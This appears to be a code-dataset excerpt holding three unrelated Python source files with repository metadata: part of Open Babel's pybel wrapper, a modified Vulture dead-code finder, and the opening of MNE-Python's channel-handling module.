atomicmass, atomicnum, cidx, coords, coordidx, exactmass,
formalcharge, heavyvalence, heterovalence, hyb, idx,
implicitvalence, isotope, partialcharge, residue, spin, type,
valence, vector.
(refer to the Open Babel library documentation for more info).
The original Open Babel atom can be accessed using the attribute:
OBAtom
"""
def __init__(self, OBAtom):
self.OBAtom = OBAtom
@property
def coords(self):
return (self.OBAtom.GetX(), self.OBAtom.GetY(), self.OBAtom.GetZ())
@property
def atomicmass(self):
return self.OBAtom.GetAtomicMass()
@property
def atomicnum(self):
return self.OBAtom.GetAtomicNum()
@property
def cidx(self):
return self.OBAtom.GetCIdx()
@property
def coordidx(self):
return self.OBAtom.GetCoordinateIdx()
@property
def exactmass(self):
return self.OBAtom.GetExactMass()
@property
def formalcharge(self):
return self.OBAtom.GetFormalCharge()
@property
def heavyvalence(self):
return self.OBAtom.GetHvyValence()
@property
def heterovalence(self):
return self.OBAtom.GetHeteroValence()
@property
def hyb(self):
return self.OBAtom.GetHyb()
@property
def idx(self):
return self.OBAtom.GetIdx()
@property
def implicitvalence(self):
return self.OBAtom.GetImplicitValence()
@property
def isotope(self):
return self.OBAtom.GetIsotope()
@property
def partialcharge(self):
return self.OBAtom.GetPartialCharge()
@property
def residue(self):
return Residue(self.OBAtom.GetResidue())
@property
def spin(self):
return self.OBAtom.GetSpinMultiplicity()
@property
def type(self):
return self.OBAtom.GetType()
@property
def valence(self):
return self.OBAtom.GetValence()
@property
def vector(self):
return self.OBAtom.GetVector()
def __str__(self):
c = self.coords
return "Atom: %d (%.2f %.2f %.2f)" % (self.atomicnum, c[0], c[1], c[2])
class Residue(object):
"""Represent a Pybel residue.
Required parameter:
OBResidue -- an Open Babel OBResidue
Attributes:
atoms, idx, name.
(refer to the Open Babel library documentation for more info).
The original Open Babel atom can be accessed using the attribute:
OBResidue
"""
def __init__(self, OBResidue):
self.OBResidue = OBResidue
@property
def atoms(self):
return [Atom(atom) for atom in ob.OBResidueAtomIter(self.OBResidue)]
@property
def idx(self):
return self.OBResidue.GetIdx()
@property
def name(self):
return self.OBResidue.GetName()
def __iter__(self):
"""Iterate over the Atoms of the Residue.
This allows constructions such as the following:
for atom in residue:
print atom
"""
return iter(self.atoms)
def _findbits(fp, bitsperint):
"""Find which bits are set in a list/vector.
This function is used by the Fingerprint class.
>>> _findbits([13, 71], 8)
[1, 3, 4, 9, 10, 11, 15]
"""
ans = []
start = 1
if sys.platform[:4] == "java":
fp = [fp.get(i) for i in range(fp.size())]
for x in fp:
i = start
while x > 0:
if x % 2:
ans.append(i)
x >>= 1
i += 1
start += bitsperint
return ans
class Fingerprint(object):
"""A Molecular Fingerprint.
Required parameters:
fingerprint -- a vector calculated by OBFingerprint.FindFingerprint()
Attributes:
fp -- the underlying fingerprint object
bits -- a list of bits set in the Fingerprint
Methods:
The "|" operator can be used to calculate the Tanimoto coeff. For
example, given two Fingerprints 'a', and 'b', the Tanimoto coefficient
is given by:
tanimoto = a | b
"""
def __init__(self, fingerprint):
self.fp = fingerprint
def __or__(self, other):
return ob.OBFingerprint.Tanimoto(self.fp, other.fp)
@property
def bits(self):
return _findbits(self.fp, ob.OBFingerprint.Getbitsperint())
def __str__(self):
fp = self.fp
if sys.platform[:4] == "java":
fp = [self.fp.get(i) for i in range(self.fp.size())]
return ", ".join([str(x) for x in fp])
class Smarts(object):
"""A Smarts Pattern Matcher
Required parameters:
smartspattern
Methods:
findall(molecule)
Example:
>>> mol = readstring("smi","CCN(CC)CC") # triethylamine
>>> smarts = Smarts("[#6][#6]") # Matches an ethyl group
>>> print smarts.findall(mol)
[(1, 2), (4, 5), (6, 7)]
The numbers returned are the indices (starting from 1) of the atoms
that match the SMARTS pattern. In this case, there are three matches
for each of the three ethyl groups in the molecule.
"""
def __init__(self, smartspattern):
"""Initialise with a SMARTS pattern."""
self.obsmarts = ob.OBSmartsPattern()
success = self.obsmarts.Init(smartspattern)
if not success:
raise IOError("Invalid SMARTS pattern")
def findall(self, molecule):
"""Find all matches of the SMARTS pattern to a particular molecule.
Required parameters:
molecule
"""
self.obsmarts.Match(molecule.OBMol)
vector = self.obsmarts.GetUMapList()
if sys.platform[:4] == "java":
vector = [vector.get(i) for i in range(vector.size())]
return list(vector)
class MoleculeData(object):
"""Store molecule data in a dictionary-type object
Required parameters:
obmol -- an Open Babel OBMol
Methods and accessor methods are like those of a dictionary except
that the data is retrieved on-the-fly from the underlying OBMol.
Example:
>>> mol = readfile("sdf", 'head.sdf').next() # Python 2
>>> # mol = next(readfile("sdf", 'head.sdf')) # Python 3
>>> data = mol.data
>>> print data
{'Comment': 'CORINA 2.61 0041 25.10.2001', 'NSC': '1'}
>>> print len(data), data.keys(), data.has_key("NSC")
2 ['Comment', 'NSC'] True
>>> print data['Comment']
CORINA 2.61 0041 25.10.2001
>>> data['Comment'] = 'This is a new comment'
>>> for k,v in data.items():
... print k, "-->", v
Comment --> This is a new comment
NSC --> 1
>>> del data['NSC']
>>> print len(data), data.keys(), data.has_key("NSC")
1 ['Comment'] False
"""
def __init__(self, obmol):
self._mol = obmol
def _data(self):
data = self._mol.GetData()
if sys.platform[:4] == "java":
data = [data.get(i) for i in range(data.size())]
answer = [x for x in data if
x.GetDataType() == _obconsts.PairData or
x.GetDataType() == _obconsts.CommentData]
if sys.platform[:3] != "cli":
answer = [_obfuncs.toPairData(x) for x in answer]
return answer
def _testforkey(self, key):
if key not in self:
raise KeyError("'%s'" % key)
def keys(self):
return [x.GetAttribute() for x in self._data()]
def values(self):
return [x.GetValue() for x in self._data()]
def items(self):
return iter(zip(self.keys(), self.values()))
def __iter__(self):
return iter(self.keys())
def iteritems(self): # Can remove for Python 3
return self.items()
def __len__(self):
return len(self._data())
def __contains__(self, key):
return self._mol.HasData(key)
def __delitem__(self, key):
self._testforkey(key)
self._mol.DeleteData(self._mol.GetData(key))
def clear(self):
for key in self:
del self[key]
def has_key(self, key):
return key in self
def update(self, dictionary):
for k, v in dictionary.items():
self[k] = v
def __getitem__(self, key):
self._testforkey(key)
answer = self._mol.GetData(key)
if sys.platform[:3] != "cli":
answer = _obfuncs.toPairData(answer)
return answer.GetValue()
def __setitem__(self, key, value):
if key in self:
if sys.platform[:3] != "cli":
pairdata = _obfuncs.toPairData(self._mol.GetData(key))
else:
pairdata = self._mol.GetData(key).Downcast[ob.OBPairData]()
pairdata.SetValue(str(value))
else:
pairdata = ob.OBPairData()
pairdata.SetAttribute(key)
pairdata.SetValue(str(value))
self._mol.CloneData(pairdata)
def __repr__(self):
return dict(self.items()).__repr__()
if sys.platform[:3] == "cli":
class _MyForm(Form):
def __init__(self):
Form.__init__(self)
def setup(self, filename, title):
# adjust the form's client area size to the picture
self.ClientSize = Size(300, 300)
self.Text = title
self.filename = filename
self.image = Image.FromFile(self.filename)
pictureBox = PictureBox()
# this will fit the image to the form
pictureBox.SizeMode = PictureBoxSizeMode.StretchImage
pictureBox.Image = self.image
# fit the picture box to the frame
pictureBox.Dock = DockStyle.Fill
self.Controls.Add(pictureBox)
self.Show()
if __name__ == "__main__": # pragma: no cover
import doctest
doctest.testmod(verbose=True)
|
stevenvdb/openbabel
|
scripts/python/pybel.py
|
Python
|
gpl-2.0
| 33,493
|
[
"Open Babel",
"Pybel"
] |
81b39a49528dbbeacd1ad6fbe5f0549e18feff7a27431d8a9239db43db5b1b47
|
# -*- coding: utf-8 -*-
#
# vulture - Find dead code.
#
# Copyright (C) 2012 Jendrik Seipp (jendrikseipp@web.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import ast
from fnmatch import fnmatchcase
import os
import re
import traceback
__version__ = "0.4.1"
FORMAT_STRING_PATTERN = re.compile(r'\%\((\S+)\)s')
### Helper functions
from sys import path as sys_path
def get_possible_import_paths():
" return directories in sys.path and their children "
startdirs = ["./"]
directories = ["./"]
# cleanup this data
for d in sys_path:
if os.path.isdir(d):
startdirs.append(d)
directories.append(d)
# search children too
for d in startdirs:
localdirs = os.listdir(d)
#print localdirs
for p in localdirs:
full = os.path.join(d,p)
if os.path.isdir(full):
if full not in directories:
directories.append(full)
return directories
def find_module(name, directories):
" search list of directories for name.py "
i = 0
found = False
path = None
while i < len(directories):
path = os.path.join(directories[i], name+'.py')
if os.path.exists(path):
found = True
break
i += 1
#
return path
class Item(str):
def __new__(cls, name, typ, file, lineno, line):
item = str.__new__(cls, name)
item.typ = typ
item.file = file
item.lineno = lineno
item.line = line
return item
def file_lineno(item):
return (item.file.lower(), item.lineno)
class Vulture(ast.NodeVisitor):
"""Find dead stuff."""
def __init__(self, exclude=None, verbose=False, halt_on_main=False):
self.exclude = []
for pattern in exclude or []:
if not any(char in pattern for char in ['*', '?', '[']):
pattern = '*%s*' % pattern
self.exclude.append(pattern)
self.verbose = verbose
self.defined_funcs = []
self.used_funcs = []
self.defined_props = []
self.defined_attrs = []
self.used_attrs = []
self.defined_vars = []
self.used_vars = []
self.tuple_assign_vars = []
self.file = ''
self.code = None
# if halt_on_main then stop when we get to '__main__' == __name__
self.halt_on_main = halt_on_main
self.halt = False
self.in_main_file = True
self.module_dirs = get_possible_import_paths()
self.import_paths = []
def scan(self, node_string):
self.code = node_string.splitlines()
try:
node = ast.parse(node_string, filename=self.file)
except SyntaxError:
print()
print('Syntax error in file %s:' % self.file)
traceback.print_exc()
print()
return
self.visit(node)
def _get_modules(self, paths, toplevel=True):
"""Take files from the command line even if they don't end with .py."""
modules = []
for path in paths:
path = os.path.abspath(path)
if os.path.isfile(path) and (path.endswith('.py') or toplevel):
modules.append(path)
elif os.path.isdir(path):
subpaths = [os.path.join(path, filename)
for filename in sorted(os.listdir(path))]
modules.extend(self._get_modules(subpaths, toplevel=False))
elif toplevel:
print('Warning: %s could not be found.' % path)
return modules
def scavenge(self, paths):
modules = self._get_modules(paths)
self.included_modules = [] #!!
for module in modules:
if any(fnmatchcase(module, pattern) for pattern in self.exclude):
self.log('Excluded:', module)
continue
self.included_modules.append(module) #!!
for module in self.included_modules: #!!
self.log('Scanning:', module)
module_string = open(module).read()
self.file = module
self.halt = False # reset halt_on_main testing for each file
self.scan(module_string)
# detect first file in list
self.in_main_file = False # first file is treated differently if halt_on_main is set
def report(self):
if self.import_paths:
print("Import paths:")
for p in self.import_paths:
print(" {}".format(p))
for item in sorted(self.unused_funcs + self.unused_props +
self.unused_vars + self.unused_attrs,
key=file_lineno):
#print(item.file)
#relpath = os.path.relpath(item.file)
#path = relpath if not relpath.startswith('..') else item.file
path = item.file
print("%s:%d: Unused %s '%s'" % (path, item.lineno, item.typ,
item))
def get_import_files(self):
return self.import_paths
def get_unused_references(self):
return(sorted(self.unused_funcs + self.unused_props +
self.unused_vars + self.unused_attrs,
key=file_lineno))
def get_unused(self, defined, used):
return list(sorted(set(defined) - set(used), key=lambda x: x.lower()))
@property
def unused_funcs(self):
return self.get_unused(self.defined_funcs,
self.used_funcs + self.used_attrs)
@property
def unused_props(self):
return self.get_unused(self.defined_props, self.used_attrs)
@property
def unused_vars(self):
return self.get_unused(self.defined_vars,
self.used_vars + self.used_attrs + self.tuple_assign_vars)
@property
def unused_attrs(self):
return self.get_unused(self.defined_attrs, self.used_attrs)
def _get_lineno(self, node):
return getattr(node, 'lineno', 1)
def _get_line(self, node):
return self.code[self._get_lineno(node) - 1] if self.code else ""
def _get_item(self, node, typ):
name = getattr(node, 'name', None)
id = getattr(node, 'id', None)
attr = getattr(node, 'attr', None)
assert len([x for x in (name, id, attr) if x is not None]) == 1
return Item(name or id or attr, typ, self.file, node.lineno,
self._get_line(node))
def log(self, *args):
if self.verbose:
print(*args)
def print_node(self, node):
self.log(self._get_lineno(node), ast.dump(node), self._get_line(node))
def _get_func_name(self, func):
for field in func._fields:
if field == 'id':
return func.id
elif field == 'func':
return self._get_func_name(func.func)
return func.attr
def visit_FunctionDef(self, node):
for decorator in node.decorator_list:
if getattr(decorator, 'id', None) == 'property':
self.defined_props.append(self._get_item(node, 'property'))
break
else:
# Only executed if function is not a property.
if not (node.name.startswith('__') and node.name.endswith('__')):
self.defined_funcs.append(self._get_item(node, 'function'))
def visit_Attribute(self, node):
item = self._get_item(node, 'attribute')
if isinstance(node.ctx, ast.Store):
self.log('defined_attrs <-', item)
self.defined_attrs.append(item)
elif isinstance(node.ctx, ast.Load):
self.log('useed_attrs <-', item)
self.used_attrs.append(item)
def visit_Name(self, node):
if node.id != 'object':
self.used_funcs.append(node.id)
if isinstance(node.ctx, ast.Load):
self.log('used_vars <-', node.id)
self.used_vars.append(node.id)
elif isinstance(node.ctx, ast.Store):
# Ignore _x (pylint convention), __x, __x__ (special method).
if not node.id.startswith('_'):
item = self._get_item(node, 'variable')
self.log('defined_vars <-', item)
self.defined_vars.append(item)
def _find_tuple_assigns(self, node):
# Find all tuple assignments. Those have the form
# Assign->Tuple->Name or For->Tuple->Name or comprehension->Tuple->Name
for child in ast.iter_child_nodes(node):
if not isinstance(child, ast.Tuple):
continue
for grandchild in ast.walk(child):
if (isinstance(grandchild, ast.Name) and
isinstance(grandchild.ctx, ast.Store)):
self.log('tuple_assign_vars <-', grandchild.id)
self.tuple_assign_vars.append(grandchild.id)
def visit_Assign(self, node):
self._find_tuple_assigns(node)
def visit_For(self, node):
self._find_tuple_assigns(node)
def visit_comprehension(self, node):
self._find_tuple_assigns(node)
def visit_ClassDef(self, node):
self.defined_funcs.append(self._get_item(node, 'class'))
def visit_Str(self, node):
"""Variables may appear in format strings: '%(a)s' % locals()"""
self.used_vars.extend(FORMAT_STRING_PATTERN.findall(node.s))
# tests for __name__ == '__main__' if halt_on_main flag is set
def visit_If(self, node): #!!
" stop processing when find '__main__' test in if statement "
if (not self.in_main_file) and self.halt_on_main:
data = ast.dump(node)
if data.find('__name__') > 0 and data.find('__main__') > 0:
#stop processing
self.halt = True
def visit_Import(self, node):
import_assoc = []
#print ('### import node')
data = ast.dump(node)
#print(data.split())
names = data.split('names=')[1].split()
i = 1
#print(names)
for x in names:
for y in x.split('='):
i = 1-i
element = y.strip("',[]()")
#print(element)
if i == 0:
#aliaspos = element.find('(') # only really need name
#if aliaspos > -1:
# element = element[aliaspos+1:]
import_assoc.append([element])
else:
import_assoc[-1].append(element)
#print(import_assoc)
# add paths to
for i in range(0, len(import_assoc), 2): # always pairs
name = import_assoc[i][1]
asname = import_assoc[i+1][1]
if asname:
print("Found import {} as {}".format(name, asname))
else:
print("Found import {}".format(name))
# check path exists
path = find_module(name, self.module_dirs)
if path and os.path.exists(path):
print(" importing")
if path not in self.included_modules:
self.included_modules.append(path)
self.import_paths.append(path)
#print("###", len(self.included_modules),self.included_modules)
### examples
#Import(names=[alias(name='kalman', asname=None), alias(name='bit_manipulation', asname=None)])
#Import(names=[alias(name='bits', asname='bb')])
def visit(self, node):
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method, None)
if not self.halt: # only set if halt_on_main flag is set
if visitor is not None:
if self.verbose:
self.print_node(node)
visitor(node)
self.generic_visit(node)
|
Neon22/python-flavin
|
wake.py
|
Python
|
gpl-2.0
| 12,499
|
[
"VisIt"
] |
07013272181068533c7bc48c9ee20cbf190638ce4b22cdd12e37baa338db3fb0
|
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Matti Hämäläinen <msh@nmr.mgh.harvard.edu>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
# Daniel McCloy <dan.mccloy@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
import sys
from collections import OrderedDict
from copy import deepcopy
from functools import partial
import numpy as np
from scipy import sparse
from ..defaults import HEAD_SIZE_DEFAULT, _handle_default
from ..utils import (verbose, logger, warn, _check_preload, _validate_type,
fill_doc, _check_option)
from ..io.compensator import get_current_comp
from ..io.constants import FIFF
from ..io.meas_info import anonymize_info, Info, MontageMixin, create_info
from ..io.pick import (channel_type, pick_info, pick_types, _picks_by_type,
_check_excludes_includes, _contains_ch_type,
channel_indices_by_type, pick_channels, _picks_to_idx,
_get_channel_types)
from ..io.write import DATE_NONE
def _get_meg_system(info):
"""Educated guess for the helmet type based on channels."""
have_helmet = True
for ch in info['chs']:
if ch['kind'] == FIFF.FIFFV_MEG_CH:
# Only take first 16 bits, as higher bits store CTF grad comp order
coil_type = ch['coil_type'] & 0xFFFF
if coil_type == FIFF.FIFFV_COIL_NM_122:
system = '122m'
break
elif coil_type // 1000 == 3: # All Vectorview coils are 30xx
system = '306m'
break
elif (coil_type == FIFF.FIFFV_COIL_MAGNES_MAG or
coil_type == FIFF.FIFFV_COIL_MAGNES_GRAD):
nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
for c in info['chs']])
system = 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
break
elif coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
system = 'CTF_275'
break
elif coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
system = 'KIT'
break
elif coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
system = 'BabySQUID'
break
elif coil_type == FIFF.FIFFV_COIL_ARTEMIS123_GRAD:
system = 'ARTEMIS123'
have_helmet = False
break
else:
system = 'unknown'
have_helmet = False
return system, have_helmet
def _get_ch_type(inst, ch_type, allow_ref_meg=False):
"""Choose a single channel type (usually for plotting).
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
allowed_types = ['mag', 'grad', 'planar1', 'planar2', 'eeg', 'csd',
'fnirs_cw_amplitude', 'fnirs_od', 'hbo', 'hbr',
'ecog', 'seeg']
allowed_types += ['ref_meg'] if allow_ref_meg else []
for type_ in allowed_types:
if isinstance(inst, Info):
if _contains_ch_type(inst, type_):
ch_type = type_
break
elif type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(instances, copy=True, verbose=None):
"""Equalize channel picks and ordering across multiple MNE-Python objects.
First, all channels that are not common to each object are dropped. Then,
using the first object in the list as a template, the channels of each
object are re-ordered to match the template. The end result is that all
given objects define the same channels, in the same order.
Parameters
----------
instances : list
A list of MNE-Python objects to equalize the channels for. Objects can
be of type Raw, Epochs, Evoked, AverageTFR, Forward, Covariance,
CrossSpectralDensity or Info.
copy : bool
When dropping and/or re-ordering channels, an object will be copied
when this parameter is set to ``True``. When set to ``False`` (the
default) the dropping and re-ordering of channels happens in-place.
.. versionadded:: 0.20.0
%(verbose)s
Returns
-------
equalized_instances : list
A list of MNE-Python objects that have the same channels defined in the
same order.
Notes
-----
This function operates inplace.
"""
from ..cov import Covariance
from ..io.base import BaseRaw
from ..io.meas_info import Info
from ..epochs import BaseEpochs
from ..evoked import Evoked
from ..forward import Forward
from ..time_frequency import _BaseTFR, CrossSpectralDensity
# Instances need to have a `ch_names` attribute and a `pick_channels`
# method that supports `ordered=True`.
allowed_types = (BaseRaw, BaseEpochs, Evoked, _BaseTFR, Forward,
Covariance, CrossSpectralDensity, Info)
allowed_types_str = ("Raw, Epochs, Evoked, TFR, Forward, Covariance, "
"CrossSpectralDensity or Info")
for inst in instances:
_validate_type(inst, allowed_types, "Instances to be modified",
allowed_types_str)
chan_template = instances[0].ch_names
logger.info('Identifying common channels ...')
channels = [set(inst.ch_names) for inst in instances]
common_channels = set(chan_template).intersection(*channels)
all_channels = set(chan_template).union(*channels)
dropped = list(set(all_channels - common_channels))
# Preserve the order of chan_template
order = np.argsort([chan_template.index(ch) for ch in common_channels])
common_channels = np.array(list(common_channels))[order].tolist()
# Update all instances to match the common_channels list
reordered = False
equalized_instances = []
for inst in instances:
# Only perform picking when needed
if inst.ch_names != common_channels:
if copy:
inst = inst.copy()
inst.pick_channels(common_channels, ordered=True)
if len(inst.ch_names) == len(common_channels):
reordered = True
equalized_instances.append(inst)
if dropped:
logger.info('Dropped the following channels:\n%s' % dropped)
elif reordered:
logger.info('Channels have been re-ordered.')
return equalized_instances
class ContainsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
def __contains__(self, ch_type):
"""Check channel type membership.
Parameters
----------
ch_type : str
Channel type to check for. Can be e.g. 'meg', 'eeg', 'stim', etc.
Returns
-------
in : bool
Whether or not the instance contains the given channel type.
Examples
--------
Channel type membership can be tested as::
>>> 'meg' in inst # doctest: +SKIP
True
>>> 'seeg' in inst # doctest: +SKIP
False
"""
if ch_type == 'meg':
has_ch_type = (_contains_ch_type(self.info, 'mag') or
_contains_ch_type(self.info, 'grad'))
else:
has_ch_type = _contains_ch_type(self.info, ch_type)
return has_ch_type
@property
def compensation_grade(self):
"""The current gradient compensation grade."""
return get_current_comp(self.info)
@fill_doc
def get_channel_types(self, picks=None, unique=False, only_data_chs=False):
"""Get a list of channel type for each channel.
Parameters
----------
%(picks_all)s
unique : bool
Whether to return only unique channel types. Default is ``False``.
only_data_chs : bool
Whether to ignore non-data channels. Default is ``False``.
Returns
-------
channel_types : list
The channel types.
"""
return _get_channel_types(self.info, picks=picks, unique=unique,
only_data_chs=only_data_chs)
# XXX Eventually de-duplicate with _kind_dict of mne/io/meas_info.py
_human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
'eeg': FIFF.FIFFV_EEG_CH,
'emg': FIFF.FIFFV_EMG_CH,
'eog': FIFF.FIFFV_EOG_CH,
'exci': FIFF.FIFFV_EXCI_CH,
'ias': FIFF.FIFFV_IAS_CH,
'misc': FIFF.FIFFV_MISC_CH,
'resp': FIFF.FIFFV_RESP_CH,
'seeg': FIFF.FIFFV_SEEG_CH,
'stim': FIFF.FIFFV_STIM_CH,
'syst': FIFF.FIFFV_SYST_CH,
'bio': FIFF.FIFFV_BIO_CH,
'ecog': FIFF.FIFFV_ECOG_CH,
'fnirs_cw_amplitude': FIFF.FIFFV_FNIRS_CH,
'fnirs_od': FIFF.FIFFV_FNIRS_CH,
'hbo': FIFF.FIFFV_FNIRS_CH,
'hbr': FIFF.FIFFV_FNIRS_CH}
_human2unit = {'ecg': FIFF.FIFF_UNIT_V,
'eeg': FIFF.FIFF_UNIT_V,
'emg': FIFF.FIFF_UNIT_V,
'eog': FIFF.FIFF_UNIT_V,
'exci': FIFF.FIFF_UNIT_NONE,
'ias': FIFF.FIFF_UNIT_NONE,
'misc': FIFF.FIFF_UNIT_V,
'resp': FIFF.FIFF_UNIT_NONE,
'seeg': FIFF.FIFF_UNIT_V,
'stim': FIFF.FIFF_UNIT_NONE,
'syst': FIFF.FIFF_UNIT_NONE,
'bio': FIFF.FIFF_UNIT_V,
'ecog': FIFF.FIFF_UNIT_V,
'fnirs_cw_amplitude': FIFF.FIFF_UNIT_V,
'fnirs_od': FIFF.FIFF_UNIT_NONE,
'hbo': FIFF.FIFF_UNIT_MOL,
'hbr': FIFF.FIFF_UNIT_MOL}
_unit2human = {FIFF.FIFF_UNIT_V: 'V',
FIFF.FIFF_UNIT_T: 'T',
FIFF.FIFF_UNIT_T_M: 'T/m',
FIFF.FIFF_UNIT_MOL: 'M',
FIFF.FIFF_UNIT_NONE: 'NA',
FIFF.FIFF_UNIT_CEL: 'C'}
def _check_set(ch, projs, ch_type):
"""Ensure type change is compatible with projectors."""
new_kind = _human2fiff[ch_type]
if ch['kind'] != new_kind:
for proj in projs:
if ch['ch_name'] in proj['data']['col_names']:
raise RuntimeError('Cannot change channel type for channel %s '
'in projector "%s"'
% (ch['ch_name'], proj['desc']))
ch['kind'] = new_kind
class SetChannelsMixin(MontageMixin):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def set_eeg_reference(self, ref_channels='average', projection=False,
ch_type='auto', verbose=None):
"""Specify which reference to use for EEG data.
Use this function to explicitly specify the desired reference for EEG.
This can be either an existing electrode or a new virtual channel.
This function will re-reference the data according to the desired
reference.
Parameters
----------
ref_channels : list of str | str
The name(s) of the channel(s) used to construct the reference. To
apply an average reference, specify ``'average'`` here (default).
If an empty list is specified, the data is assumed to already have
a proper reference and MNE will not attempt any re-referencing of
the data. Defaults to an average reference.
projection : bool
If ``ref_channels='average'`` this argument specifies if the
average reference should be computed as a projection (True) or not
(False; default). If ``projection=True``, the average reference is
added as a projection and is not applied to the data (it can be
applied afterwards with the ``apply_proj`` method). If
``projection=False``, the average reference is directly applied to
the data. If ``ref_channels`` is not ``'average'``, ``projection``
must be set to ``False`` (the default in this case).
ch_type : 'auto' | 'eeg' | 'ecog' | 'seeg'
The name of the channel type to apply the reference to. If 'auto',
the first channel type of eeg, ecog or seeg that is found (in that
order) will be selected.
.. versionadded:: 0.19
%(verbose_meth)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'``
and ``projection=True`` a projection will be added instead of
directly re-referencing the data.
%(set_eeg_reference_see_also_notes)s
"""
from ..io.reference import set_eeg_reference
return set_eeg_reference(self, ref_channels=ref_channels, copy=False,
projection=projection, ch_type=ch_type)[0]
def _get_channel_positions(self, picks=None):
"""Get channel locations from info.
Parameters
----------
picks : str | list | slice | None
None gets good data indices.
Notes
-----
.. versionadded:: 0.9.0
"""
picks = _picks_to_idx(self.info, picks)
chs = self.info['chs']
pos = np.array([chs[k]['loc'][:3] for k in picks])
n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
if n_zero > 1: # XXX some systems have origin (0, 0, 0)
raise ValueError('Could not extract channel positions for '
'{} channels'.format(n_zero))
return pos
def _set_channel_positions(self, pos, names):
"""Update channel locations in info.
Parameters
----------
pos : array-like | np.ndarray, shape (n_points, 3)
The channel positions to be set.
names : list of str
The names of the channels to be set.
Notes
-----
.. versionadded:: 0.9.0
"""
if len(pos) != len(names):
raise ValueError('Number of channel positions not equal to '
'the number of names given.')
pos = np.asarray(pos, dtype=np.float64)
if pos.shape[-1] != 3 or pos.ndim != 2:
msg = ('Channel positions must have the shape (n_points, 3) '
'not %s.' % (pos.shape,))
raise ValueError(msg)
for name, p in zip(names, pos):
if name in self.ch_names:
idx = self.ch_names.index(name)
self.info['chs'][idx]['loc'][:3] = p
else:
msg = ('%s was not found in the info. Cannot be updated.'
% name)
raise ValueError(msg)
@verbose
def set_channel_types(self, mapping, verbose=None):
"""Define the sensor type of channels.
Parameters
----------
mapping : dict
A dictionary mapping a channel to a sensor type (str), e.g.,
``{'EEG061': 'eog'}``.
%(verbose_meth)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
The instance (modified in place).
.. versionchanged:: 0.20
Return the instance.
Notes
-----
The following sensor types are accepted:
ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst, ecog,
hbo, hbr, fnirs_cw_amplitude, fnirs_od
.. versionadded:: 0.9.0
"""
ch_names = self.info['ch_names']
# first check and assemble clean mappings of index and name
unit_changes = dict()
for ch_name, ch_type in mapping.items():
if ch_name not in ch_names:
raise ValueError("This channel name (%s) doesn't exist in "
"info." % ch_name)
c_ind = ch_names.index(ch_name)
if ch_type not in _human2fiff:
raise ValueError('This function cannot change to this '
'channel type: %s. Accepted channel types '
'are %s.'
% (ch_type,
", ".join(sorted(_human2unit.keys()))))
# Set sensor type
_check_set(self.info['chs'][c_ind], self.info['projs'], ch_type)
unit_old = self.info['chs'][c_ind]['unit']
unit_new = _human2unit[ch_type]
if unit_old not in _unit2human:
raise ValueError("Channel '%s' has unknown unit (%s). Please "
"fix the measurement info of your data."
% (ch_name, unit_old))
if unit_old != _human2unit[ch_type]:
this_change = (_unit2human[unit_old], _unit2human[unit_new])
if this_change not in unit_changes:
unit_changes[this_change] = list()
unit_changes[this_change].append(ch_name)
self.info['chs'][c_ind]['unit'] = _human2unit[ch_type]
if ch_type in ['eeg', 'seeg', 'ecog']:
coil_type = FIFF.FIFFV_COIL_EEG
elif ch_type == 'hbo':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBO
elif ch_type == 'hbr':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBR
elif ch_type == 'fnirs_cw_amplitude':
coil_type = FIFF.FIFFV_COIL_FNIRS_CW_AMPLITUDE
elif ch_type == 'fnirs_od':
coil_type = FIFF.FIFFV_COIL_FNIRS_OD
else:
coil_type = FIFF.FIFFV_COIL_NONE
self.info['chs'][c_ind]['coil_type'] = coil_type
msg = "The unit for channel(s) {0} has changed from {1} to {2}."
for this_change, names in unit_changes.items():
warn(msg.format(", ".join(sorted(names)), *this_change))
return self
@fill_doc
def rename_channels(self, mapping):
"""Rename channels.
Parameters
----------
%(rename_channels_mapping)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
The instance (modified in place).
.. versionchanged:: 0.20
Return the instance.
Notes
-----
.. versionadded:: 0.9.0
"""
rename_channels(self.info, mapping)
return self
@verbose
def plot_sensors(self, kind='topomap', ch_type=None, title=None,
show_names=False, ch_groups=None, to_sphere=True,
axes=None, block=False, show=True, sphere=None,
verbose=None):
"""Plot sensor positions.
Parameters
----------
kind : str
Whether to plot the sensors as 3d, topomap or as an interactive
sensor selection dialog. Available options 'topomap', '3d',
'select'. If 'select', a set of channels can be selected
interactively by using lasso selector or clicking while holding
control key. The selected channels are returned along with the
figure instance. Defaults to 'topomap'.
ch_type : None | str
The channel type to plot. Available options 'mag', 'grad', 'eeg',
'seeg', 'ecog', 'all'. If ``'all'``, all the available mag, grad,
eeg, seeg and ecog channels are plotted. If None (default), then
channels are chosen in the order given above.
title : str | None
Title for the figure. If None (default), equals to ``'Sensor
positions (%%s)' %% ch_type``.
show_names : bool | array of str
